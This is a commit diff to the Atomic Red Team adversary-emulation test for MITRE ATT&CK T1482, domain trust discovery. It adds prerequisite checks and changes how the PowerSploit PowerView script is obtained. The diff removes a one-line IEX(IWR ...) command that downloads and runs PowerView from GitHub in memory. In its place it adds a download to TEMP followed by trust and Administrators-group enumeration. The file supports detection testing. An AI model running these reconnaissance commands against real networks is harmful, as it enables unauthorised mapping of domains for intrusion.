T1482: add PowerView dependency & RSAT notes (redcanaryco#1041)

Co-authored-by: Carrie Roberts <[email protected]>

atomics/T1482/T1482.yaml

@@ -23,6 +23,13 @@ atomic_tests:
     This technique has been used by the Trickbot malware family.
   supported_platforms:
     - windows
+  dependencies:
+  - description: |
+      nltest.exe from RSAT must be present on disk
+    prereq_command: |
+      WHERE nltest.exe >NUL 2>&1
+    get_prereq_command: |
+      echo Sorry RSAT must be installed manually
   executor:
     name: command_prompt
     command: |
@@ -35,7 +42,27 @@ atomic_tests:
     Requires the installation of PowerShell AD admin cmdlets via Windows RSAT or the Windows Server AD DS role.
   supported_platforms:
     - windows
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      PowerView PowerShell script must exist on disk
+    prereq_command: |
+      if (Test-Path $env:TEMP\PowerView.ps1) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1" -OutFile "$env:TEMP\PowerView.ps1"
+  - description: |
+      RSAT PowerShell AD admin cmdlets must be installed
+    prereq_command: |
+      if ((Get-Command "Get-ADDomain") -And (Get-Command "Get-ADGroupMember")) { exit 0 } else { exit 1 }
+    get_prereq_command: |
+      Write-Host "Sorry RSAT must be installed manually"
   executor:
+    command: |
+      Import-Module "$env:TEMP\PowerView.ps1"
+      Get-NetDomainTrust
+      Get-NetForestTrust
+      Get-ADDomain
+      Get-ADGroupMember Administrators -Recursive
     name: powershell
     elevation_required: false
-    command: IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1'); Get-NetDomainTrust ; Get-NetForestTrust ; Get-ADDomain ; Get-ADGroupMember Administrators -Recursive
+